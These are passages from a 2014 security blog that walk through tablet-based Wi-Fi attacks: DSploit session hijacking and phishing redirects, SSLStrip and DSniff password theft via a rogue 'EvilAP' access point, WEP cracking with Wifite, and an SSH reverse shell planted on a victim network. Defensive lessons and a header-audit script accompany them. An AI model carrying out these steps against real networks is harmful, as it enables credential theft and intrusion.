<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4hyI7xJdbHY4ENsqEgMnDyRwd_-WKflUSS8wZVW-09LOp1ujq-VsVGsxqca0VFnq77VZA_w0DigAJ8dvaBZDEyeqDPc1c6m4tlPJkQfo8R1U8W_N29BmiBzuOCsUwDLzWMSXY4g0xcRwp/s1600/freemail_session.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4hyI7xJdbHY4ENsqEgMnDyRwd_-WKflUSS8wZVW-09LOp1ujq-VsVGsxqca0VFnq77VZA_w0DigAJ8dvaBZDEyeqDPc1c6m4tlPJkQfo8R1U8W_N29BmiBzuOCsUwDLzWMSXY4g0xcRwp/s1600/freemail_session.png" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's select that session, and be amazed that we logged into the user's webmail session.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWRTqTND5Rk-70tcjsOxMEF9x6If01qJ51e8nIVHNMBVSMOS2HlsGX_jMk6txu4zEDwEKq1MJxPMlgAg5kwKRmfJrCyM1etdHXGNikA7p2or6Eekl9dHbAjaeGVa59jWHdUyMaAcBl2yg/s1600/freemail_loggedin.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWRTqTND5Rk-70tcjsOxMEF9x6If01qJ51e8nIVHNMBVSMOS2HlsGX_jMk6txu4zEDwEKq1MJxPMlgAg5kwKRmfJrCyM1etdHXGNikA7p2or6Eekl9dHbAjaeGVa59jWHdUyMaAcBl2yg/s1600/freemail_loggedin.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz9FI2x-_FLIsVIZNfXsfhUpuCZl6YEucfgJQdZj4c9EWgTZGJCHN-P-ujfBU6MmLNcbRPrRUfecIAsB3rgGA_hQV5URawyvVtlbUEZOof0RU6yyh5Q3g6oX0odKvto9UhXdvN0cYQmZiW/s1600/much-hacking.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz9FI2x-_FLIsVIZNfXsfhUpuCZl6YEucfgJQdZj4c9EWgTZGJCHN-P-ujfBU6MmLNcbRPrRUfecIAsB3rgGA_hQV5URawyvVtlbUEZOof0RU6yyh5Q3g6oX0odKvto9UhXdvN0cYQmZiW/s1600/much-hacking.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<h3>
Redirect traffic</h3>
This feature can be used for fun or for profit. For fun, you can redirect all the victim's traffic to http://www.kittenwar.com/. For profit, you can redirect your victim to phishing pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8i_95LO8hDdycZ94y6aKkMFNMtYQA_jLYQeDPk4KTy98ZpoROJ8xxazWYUMii6ni13N45mWg573nqU0T3KIk6M-xN1HQPMuBWcleDTk3Mk40ajkZ907jaMiTV78R6qSHtyqm-yyLr7nA/s1600/kittenwar.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO8i_95LO8hDdycZ94y6aKkMFNMtYQA_jLYQeDPk4KTy98ZpoROJ8xxazWYUMii6ni13N45mWg573nqU0T3KIk6M-xN1HQPMuBWcleDTk3Mk40ajkZ907jaMiTV78R6qSHtyqm-yyLr7nA/s1600/kittenwar.png" width="320" /></a></div>
<br />
<h3>
Replace images, videos</h3>
I think this is just for fun here. Endless Rick Rolling possibilities.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmogIB821KWR2YU39ik5k2kLlDhJB6bNMb11FPFkMb_Ht3HWomZrfFVN4vR15w6QxYOa0x15P5aRGzUHaZEzXWZQo0QegUr4by0RlT3TPVmgDgcwV9mwxr7jHh91qD1GmYK_cHeSFroSe/s1600/rickrolled3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmogIB821KWR2YU39ik5k2kLlDhJB6bNMb11FPFkMb_Ht3HWomZrfFVN4vR15w6QxYOa0x15P5aRGzUHaZEzXWZQo0QegUr4by0RlT3TPVmgDgcwV9mwxr7jHh91qD1GmYK_cHeSFroSe/s1600/rickrolled3.jpg" width="320" /></a></div>
<br />
<h3>
Script injection</h3>
This is mostly for profit: client-side injection, drive-by exploits, endless possibilities.<br />
<br />
<h3>
Custom filter</h3>
If you are familiar with ettercap, this has similar functionality (but dumber), with string or regex replacements. E.g. you can replace the news, stock prices, which pizza the victim ordered, etc. If you know more fun stuff here, please leave a comment (HTTP-only scenarios; e.g. attacking Facebook won't work).<br />
<br />
<h3>
Additional fun (not in DSploit) - SSLStrip </h3>
The one thing I really miss from the MITM section of DSploit is SSLStrip functionality. Luckily, it is built into the Pwn Pad. With the help of SSLStrip, we can remove the references to HTTPS links in the clear text HTTP traffic and replace them with HTTP. So even if the user checks the secure login checkbox at freemail.hu, the password will be sent in clear text, and thus it can be sniffed with DSniff.<br />
<br />
HTML source on the client-side without SSLstrip:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3LLx_6CK0Uaww4yc4LCQEOMNvcRQc4yHEnKVQo2EMNTuj-kUWrSFtYRan9r3cqUpw5lqRVkh6IbN77MYQwoxzQ1JVEKrQIkcy1b9FphvqLI-6tCqZQiBsscyFTF_8hHObD7T0MZmOHX9/s1600/sslstrip_freemail2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3LLx_6CK0Uaww4yc4LCQEOMNvcRQc4yHEnKVQo2EMNTuj-kUWrSFtYRan9r3cqUpw5lqRVkh6IbN77MYQwoxzQ1JVEKrQIkcy1b9FphvqLI-6tCqZQiBsscyFTF_8hHObD7T0MZmOHX9/s1600/sslstrip_freemail2.png" width="400" /></a></div>
<br />
HTML source on the client-side with SSL strip:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJF7T63nR1gRcomY8wbhrBPKd7j_jH9qzET_CD2rzf0KTN0i8rpitve7f2Wc0OkjYFLrFSuMVPnTwJE2sRVrE74Svz89cX4OmtYc1Y287xvvIoLMKHbn8dFX_LAvOuDZJC4TSkKxJhG1_/s1600/sslstrip_freemail.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJF7T63nR1gRcomY8wbhrBPKd7j_jH9qzET_CD2rzf0KTN0i8rpitve7f2Wc0OkjYFLrFSuMVPnTwJE2sRVrE74Svz89cX4OmtYc1Y287xvvIoLMKHbn8dFX_LAvOuDZJC4TSkKxJhG1_/s1600/sslstrip_freemail.png" width="400" /></a></div>
<br />
With EvilAP, SSLStrip, and DSniff, the password can be stolen. No hacking skillz needed.<br />
<h3>
Lessons learned here</h3>
If you are a website operator where you allow your users to login, always:<br />
<ol>
<li>Use HTTPS with a trusted certificate, and redirect all unencrypted traffic to HTTPS ASAP</li>
<li>Mark the session cookies with the <a href="https://www.owasp.org/index.php/SecureFlag">secure flag</a></li>
<li>Use <a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS</a> to prevent SSLStrip attacks</li>
</ol>
<div>
If you are a user:</div>
<ol>
<li>Don't trust sites with your confidential data if the above points are not fixed. Choose a more secure alternative</li>
<li>Use the HTTPS Everywhere plugin</li>
<li>For improved security, use a VPN</li>
</ol>
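<div style="text-align: justify;">
The three operator-side lessons above can be turned into a simple header audit. The following is an added example and not code from this post or from DSploit; the sample responses, the host name webmail.example and the 180-day HSTS threshold are constructed assumptions.</div>

```python
"""Audit raw HTTP/HTTPS responses against the three operator-side lessons:
(1) plain HTTP is redirected to HTTPS at once, (2) cookies carry the Secure
flag, (3) HSTS is sent. Added example; all responses below are constructed."""
import re

# Assumption: an HSTS max-age below this (180 days) is reported as too short.
MIN_HSTS_MAX_AGE = 180 * 24 * 3600
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response(raw):
    """Split a raw response (status line + headers [+ body]) into
    (status code, list of (lower-cased name, value)). Repeated headers such
    as Set-Cookie are kept as separate entries."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def header_values(headers, name):
    return [v for n, v in headers if n == name]


def audit_http(raw):
    """Lesson 1: a plain-HTTP request must be answered with a redirect to an
    https:// URL, never with the login page itself."""
    status, headers = parse_response(raw)
    location = header_values(headers, "location")
    if status in REDIRECT_CODES and location and location[0].lower().startswith("https://"):
        return []
    return ["plain HTTP is served directly instead of redirected to HTTPS"]


def audit_https(raw):
    """Lessons 2 and 3: every cookie set over HTTPS carries the Secure flag
    (the browser then never sends it over HTTP where it could be sniffed) and
    the response carries HSTS (so a later HTTP downgrade is refused)."""
    _status, headers = parse_response(raw)
    findings = []
    for cookie in header_values(headers, "set-cookie"):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks the Secure flag")
    hsts = header_values(headers, "strict-transport-security")
    if not hsts:
        findings.append("no Strict-Transport-Security header")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.IGNORECASE)
        if m is None or int(m.group(1)) < MIN_HSTS_MAX_AGE:
            findings.append("HSTS max-age is missing or shorter than 180 days")
    return findings


def audit_site(http_response, https_response):
    """Run both audits; an empty list means all three lessons are applied."""
    return audit_http(http_response) + audit_https(https_response)


# Constructed sample: a webmail that serves its login page over plain HTTP and
# sets its session cookie without Secure, the setup sniffed in this post.
WEAK_HTTP = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: SESSID=abc123; Path=/\r\n"
    "\r\n<html>login form...</html>"
)
WEAK_HTTPS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: SESSID=abc123; Path=/; HttpOnly\r\n"
    "\r\n"
)
# Constructed sample: the same site with the three lessons applied.
GOOD_HTTP = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://webmail.example/login\r\n"
    "\r\n"
)
GOOD_HTTPS = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: SESSID=abc123; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, pair in (("weak", (WEAK_HTTP, WEAK_HTTPS)),
                        ("hardened", (GOOD_HTTP, GOOD_HTTPS))):
        print(label, audit_site(*pair) or ["OK"])
```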
<div style="text-align: justify;">
Because hacking has never been so easy before.<br />
And last but not least, if you like the DSploit project, don't forget to <a href="http://dsploit.net/donate/">donate</a> to them!</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-79053686469115403772014-04-22T14:16:00.001+02:002019-10-08T15:56:42.739+02:00WiFi hacking on tablets<div style="text-align: justify;">
<a href="http://jumpespjump.blogspot.be/p/disclaimer.html" target="_blank">Disclaimer</a>: Don't hack anything where you don't have the authorization to do so. Stay legal.<br />
<br />
Ever since I bought my first Android device, I wanted to use the device for WEP cracking. Not because I need it, but I want it :) After some googling, I read that you can't use your WiFi chipset for packet injection, and I forgot the whole topic.<br />
<br />
After a while, I read about hacking on tablets (this was around a year ago), and my first opinion was: </div>
<div style="text-align: justify;">
"This is stupid, lame, and the usage of that can be very limited".<br />
<br /></div>
<div style="text-align: justify;">
After playing one day with it, my opinion just changed: </div>
<div style="text-align: justify;">
"This is stupid, lame, the usage is limited, but when it works, it is really funny :-)"<br />
<br />
At the beginning I looked at the Pwn Pad as a device that can replace a pentest workstation, working at the attacker side. Boy was I wrong. Pwn Pad should be used as a pentest device deployed at the victim's side!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You have the following options:</div>
<div style="text-align: justify;">
<ol>
<li>You have 1095 USD + VAT + shipping to buy <a href="https://www.pwnieexpress.com/penetration-testing-vulnerability-assessment-products/sensors/pwn-pad-2014/">this</a> Pwn Pad</li>
<li>You have around 200 USD to buy an old Nexus 7 tablet, a USB OTG cable, a USB WiFi dongle (e.g. TP-Link Wireless TL-WN722N USB adapter works).</li>
</ol>
</div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsGytwRJsNojC55MWDntOoLODAL4arVETyxKJIS3SwGrDQnb4-8HMEbDHrSKnNIBQXQ7alH66KcRrXXRYF7sYA4oII-F_nnHOlWl0r3Iw_-Q2HVWcrNyECw-XdJS0gNR4zXqbu-s4pVHY/s1600/2014-04-20+10.48.29_cleaned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsGytwRJsNojC55MWDntOoLODAL4arVETyxKJIS3SwGrDQnb4-8HMEbDHrSKnNIBQXQ7alH66KcRrXXRYF7sYA4oII-F_nnHOlWl0r3Iw_-Q2HVWcrNyECw-XdJS0gNR4zXqbu-s4pVHY/s1600/2014-04-20+10.48.29_cleaned.jpg" width="240" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my example, I bought a used, old 2012 Nexus 7 WiFi. Originally I bought it to play with different custom Android ROMs and rooted applications. After a while, I ran into this Pwn Pad hype again and gave it a shot.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The <a href="https://www.pwnieexpress.com/support/downloads/">Pwn Pad community edition</a> has an <a href="http://sourceforge.net/projects/pwnpad/files/?source=navbar">easy-to-use installer</a>, with a proper <a href="http://www.pwnieexpress.com/wp-content/uploads/2013/12/PwnPadCommunityEdition-FactoryImageInstallationGuide.pdf">installation description</a>. Don't forget to back up everything from your tablet before installing Pwn Pad on it!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I don't want to repeat the install guide; it is as easy as ABC. I booted an Ubuntu Live CD, installed adb and fastboot, and it was ready to roll. I have not measured the time, but the whole process took around 20 minutes.<br />
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihmbDCwjpb4e_lVVQOpfVk5QryxI4sq09zbr86SUyWXcfVO1eUn_YNr2l40tird-t6_ZWTSisiUcmAHXeSbu1rdXAw0xNmcv-jy32mUe-7U9uxWIFHX77y8zB8FMeh1vcDAMyjRYTqKYYO/s1600/Screenshot_2014-04-17-13-25-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihmbDCwjpb4e_lVVQOpfVk5QryxI4sq09zbr86SUyWXcfVO1eUn_YNr2l40tird-t6_ZWTSisiUcmAHXeSbu1rdXAw0xNmcv-jy32mUe-7U9uxWIFHX77y8zB8FMeh1vcDAMyjRYTqKYYO/s1600/Screenshot_2014-04-17-13-25-13.png" width="250" /></a></div>
<br /></div>
<div style="text-align: justify;">
The internal WiFi chipset can be used to sniff traffic or even for ARP poisoning for active MiTM. But in my case, I was not able to use the internal chipset for packet injection, which means you can't use it for WEP cracking, WPA deauth, etc. This is where the external USB WiFi comes in handy. And this is why we need the Pwn Pad Android ROM and can't use an average ROM.</div>
<div style="text-align: justify;">
<br />
There are two things where Pwn Pad really rocks. The first one is the <u>integrated drivers for</u> the external WiFi with monitor mode and <u>packet injection</u> capabilities. The second cool thing is the <u>chroot wrapper</u> around the Linux hacking tools. Every hacking tool has a start icon, so it feels like it is a native Android application, although it is running in a <u>chroot Kali</u> environment.<br />
<br /></div>
<div style="text-align: justify;">
<h3>
Wifite</h3>
</div>
<div style="text-align: justify;">
The first recommended app is Wifite. Think of it as a wrapper around the aircrack - airmon - airodump suite. My biggest problem with WEP cracking was that I had to remember a bunch of commands, or have the WEP cracking manual with me every time I had to crack it. It was overcomplicated. But thanks to Wifite, that is in the past.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to crack a WEP key, you have to:<br />
<ol>
<li>Start the Wifite app</li>
<li>Choose your adapter (the USB WiFi)<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfSykxqqYGa92wH6L-qA2bIDOU8A4_JvCNLxkR73UKgfJsw8Wiy4faCCUrNFVljStPpgG9Ayi5IvK0G4iECkESQpx7EHa9Um093B351qnXTHEv5fsCUzNDlgMCplnQSiV6cs2a4ACvocL/s1600/Screenshot_2014-04-17-13-47-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfSykxqqYGa92wH6L-qA2bIDOU8A4_JvCNLxkR73UKgfJsw8Wiy4faCCUrNFVljStPpgG9Ayi5IvK0G4iECkESQpx7EHa9Um093B351qnXTHEv5fsCUzNDlgMCplnQSiV6cs2a4ACvocL/s1600/Screenshot_2014-04-17-13-47-00.png" width="320" /></a></div>
</li>
<li>Choose the target network (wep_lan in the next example)</li>
<li>Wait for a minute </li>
<li>PROFIT!</li>
</ol>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2OhA-f8l0SCltHRpOnjYMy29MSDSFdv8CzK1vlB2_ok0G1NIcaOeRMh4fdPIN6E1olGiv0UP2w2lMIENf_d7tsIU7PK27h1PPbqzBZthq3WpPXzu2_bzjIGINOvsiIzdb0SpQCo33sVJU/s1600/p.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2OhA-f8l0SCltHRpOnjYMy29MSDSFdv8CzK1vlB2_ok0G1NIcaOeRMh4fdPIN6E1olGiv0UP2w2lMIENf_d7tsIU7PK27h1PPbqzBZthq3WpPXzu2_bzjIGINOvsiIzdb0SpQCo33sVJU/s1600/p.png" width="297" /></a></div>
<br /></div>
<div style="text-align: justify;">
<h3>
SSH reverse shell</h3>
This is one of the key functionalities of the Pwn Pad. You deploy the tablet at the victim's side, and let the tablet connect to your server via (tunneled) SSH.<br />
<br />
The basic concept of the reverse shell is that an SSH tunnel is established from the Pwn Pad tablet (client) to your external SSH server (either directly or encapsulated in another tunneling protocol), and a remote port forward is set up. This means that on your SSH server you connect to a local port, which is forwarded through the tunnel to the Pwn Pad and handled by the Pwn Pad's SSH server.<br />
<br />
I believe the best option would be to use the reverse shell over 3G, and let the tablet connect to the victim network through Ethernet or WiFi. But your preference might vary. The steps for reverse shells are again well documented in the <a href="http://www.pwnieexpress.com/wp-content/uploads/2013/12/PwnieExpressUserManual-PwnPad.pdf">documentation</a>, except that by default you also have to start the SSH server on the Pwn Pad. It is not hard, there is an app for that ;-) On your external SSH server you might need to install stunnel and ptunnel if you are not using Kali. The following output shows what you see on your external SSH server after a successful reverse shell.<br />
<br />
<pre class="prettyprint bash">root@myserver:/home/ubuntu# ssh -p 3333 pwnie@localhost
The authenticity of host '[localhost]:3333 ([127.0.0.1]:3333)' can't be established.
ECDSA key fingerprint is 14:d4:67:04:90:30:18:a4:7a:f6:82:04:e0:3c:c6:dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:3333' (ECDSA) to the list of known hosts.
pwnie@localhost's password:
_____ ___ _ ___ ___ _____ _____ ___ ___ ___ ___
| _ \ \ / / \| |_ _| __| | __\ \/ / _ \ _ \ __/ __/ __|
| _/\ \/\/ /| .` || || _| | _| > <| _/ / _|\__ \__ \
|_| \_/\_/ |_|\_|___|___| |___/_/\_\_| |_|_\___|___/___/
Release Version: 1.5.5
Release Date: 2014-01-30
Copyright 2014 Pwnie Express. All rights reserved.
By using this product you agree to the terms of the Rapid Focus
Security EULA: http://pwnieexpress.com/pdfs/RFSEULA.pdf
This product contains both open source and proprietary software.
Proprietary software is distributed under the terms of the EULA.
Open source software is distributed under the GNU GPL:
http://www.gnu.org/licenses/gpl.html
pwnie@localhost:~$
</pre>
<div>
<br />
Now you have a shell on a machine that is connected to the victim network. Sweet :) Now Metasploit, and all the other command-line tools, really make sense on the tablet.<br />
<h3>
EvilAP and DSniff</h3>
Start EvilAP (it is again a wrapper, this time around airbase-ng), choose an interface (for me the internal Nexus WiFi worked), enter an SSID (e.g. freewifi), enter a channel, choose whether to force all clients to connect to you or only those that really want to connect to you, and start.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiHxArzvi53vGo8EM1yydv9GpFFkYOkmcAJvIosBxy3nq4YJSdCf26ZI93pGpV1XwPqvWNASGr-UGhTMJ1BUXlsjSIl0cn0GHpvS2d7QYWSrq0igC_n7p-Btwz8NbLNx-3_Bt4IjpC5_H/s1600/evilap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTiHxArzvi53vGo8EM1yydv9GpFFkYOkmcAJvIosBxy3nq4YJSdCf26ZI93pGpV1XwPqvWNASGr-UGhTMJ1BUXlsjSIl0cn0GHpvS2d7QYWSrq0igC_n7p-Btwz8NbLNx-3_Bt4IjpC5_H/s1600/evilap.png" width="250" /></a></div>
<br />
The next step is to start DSniff, choose interface at0, and wait :) In this example, I used a popular Hungarian webmail, which has a checkbox option for "secure" login (default off). There are sooo many problems with this approach, e.g. you can't check the certificate before connecting, and the login page is delivered over HTTP, so one can disable the secure login checkbox seamlessly in the background, etc. In this case, I left the "secure" option at its default, off.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghusyD0tYBpQdbP_u3Zlzx4AGNkUVN6jTCLNTpbpdRzXqp7tdtF0nZLc9CU7HFKZr3Xzm9yOQNxAJTHfZecwAePzzd1qOrjLOPxkCPxMUH-nAo1BS_Sfk9INEZf70mw_quQL8-mBhJV4Cf/s1600/dsniff_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghusyD0tYBpQdbP_u3Zlzx4AGNkUVN6jTCLNTpbpdRzXqp7tdtF0nZLc9CU7HFKZr3Xzm9yOQNxAJTHfZecwAePzzd1qOrjLOPxkCPxMUH-nAo1BS_Sfk9INEZf70mw_quQL8-mBhJV4Cf/s1600/dsniff_1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv3-XYIQ7YXd1LlEN6ZWiD8cEjav907DnrHDpi4SYRBmZFCH1frf2mX0nN-txj0rzAYlqwzTgxQEcf1QkmOMG_mzvKyJm5X-PYZSq3sihiL8uwI1691wO6KXPsXe71yk4UVNc1e3oN2jEI/s1600/dsniff2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv3-XYIQ7YXd1LlEN6ZWiD8cEjav907DnrHDpi4SYRBmZFCH1frf2mX0nN-txj0rzAYlqwzTgxQEcf1QkmOMG_mzvKyJm5X-PYZSq3sihiL8uwI1691wO6KXPsXe71yk4UVNc1e3oN2jEI/s1600/dsniff2.png" width="320" /></a></div>
<br />
In the next tutorial, I'm going to show my next favorite app, DSploit ;)<br />
<br />
<h3>
Lessons learned</h3>
<ul>
<li>Hacking has never been so easy before</li>
<li>In a home environment, only use WPA2 PSK</li>
<li>Choose a long, non-dictionary passphrase as the password for WPA2</li>
<li>Don't share your WiFi passwords with people you don't trust, or change them when they don't need them anymore</li>
<li>Don't let your client device auto-connect to WiFi stations, even if the SSID looks familiar</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I believe during an engagement a Pwn Plug has better "physical cloaking" possibilities, but playing with the Pwn Pad Community Edition really gave me fun moments.<br />
<br />
And last but not least I would like to thank the Pwn Pad developers for releasing the Community Edition!<br />
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-65344089444770583952014-04-01T11:09:00.000+02:002019-10-08T15:57:28.026+02:00BYOPPP - Build your own privacy protection proxy<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
I read a <a href="http://lifehacker.com/5978098/turn-a-raspberry-pi-into-a-personal-vpn-for-secure-browsing-anywhere-you-go/all">blog post</a> about building your own privacy proxy server on a Raspberry Pi. The post got me thinking about how I could use this to protect my privacy on my Android phone, and also get rid of those annoying ads. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Since I own a Samsung Galaxy S3 LTE with Android 4.3 (with a HW based Knox counter), rooting the phone now means you <a href="http://forum.xda-developers.com/galaxy-s3/general/to-root-s3-lte-android-4-3-t2567118">break Knox and lose your warranty</a>. Past the point of no return ...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This means I have to solve this without root. Luckily newer Androids support VPN without rooting, but setting a mandatory system-wide proxy is still not possible without root. </div>
<div style="text-align: justify;">
But thanks to some iptables magic and Privoxy, this is not a problem anymore :) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The ingredients to build your own privacy protection proxy:</div>
<ul>
<li style="text-align: justify;">One (or more) cheap VPS server(s)</li>
<li style="text-align: justify;">a decent VPN program</li>
<li style="text-align: justify;">Privoxy</li>
<li style="text-align: justify;">iptables</li>
</ul>
<h2>
VPS server</h2>
<div style="text-align: justify;">
To get a cheap VPS server, I recommend Amazon EC2, but choose whatever you like. The micro instance is very cheap (<a href="http://aws.amazon.com/free/">or even free</a>) and has more than enough resources for this task. I'm using the Ubuntu free tier now and it works like a charm. Last but not least, Amazon has two-factor authentication! You can set up an Ubuntu server in under 10 minutes. Use the AWS region nearest to you; e.g. I chose EU - Ireland.<br />
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiirqVf7n0TioLVeUwUrsxiwyLIHBj0sxV7GpIUKYm0jTjx5HGBKnL9EAYaA-uILomIecURNVKeORwiZZ2fHTKQCQ4Z9SvvX8e4PWvhGSCzS3lnGAvN0sKKfOZ-1UHMWG0uLPGFI-drN7El/s1600/aws_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiirqVf7n0TioLVeUwUrsxiwyLIHBj0sxV7GpIUKYm0jTjx5HGBKnL9EAYaA-uILomIecURNVKeORwiZZ2fHTKQCQ4Z9SvvX8e4PWvhGSCzS3lnGAvN0sKKfOZ-1UHMWG0uLPGFI-drN7El/s1600/aws_3.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmd5519SFJcBAWwNbgiFZa_YRpkRKthuU9rPdiT6TwsHUCmnV3s-mIYx73WUs_HZM6KHRhkdAo7uRLlnPt0Nck3PTV2LlltjT6LlGnB1b9gHhl4waFdDAfskZSPSXm5lhl0MSh3Mia8Rwg/s1600/aws_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmd5519SFJcBAWwNbgiFZa_YRpkRKthuU9rPdiT6TwsHUCmnV3s-mIYx73WUs_HZM6KHRhkdAo7uRLlnPt0Nck3PTV2LlltjT6LlGnB1b9gHhl4waFdDAfskZSPSXm5lhl0MSh3Mia8Rwg/s1600/aws_2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h2>
VPN</h2>
</div>
<div style="text-align: justify;">
For the VPN program, I recommend the free version of OpenVPN AS (EDIT: be sure to use <a href="https://community.openvpn.net/openvpn/wiki/heartbleed">OpenVPN AS 2.0.6</a> or later, both on the server and the client). An <a href="https://openvpn.net/index.php/access-server/docs/quick-start-guide.html">easy quick start guide is here</a>; it offers GUI-based configuration and a one-click client installer for Android, iOS, Windows, Linux and OSX. The Ubuntu installer packages are <a href="https://openvpn.net/index.php/access-server/download-openvpn-as-sw/113.html?osfamily=Ubuntu">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
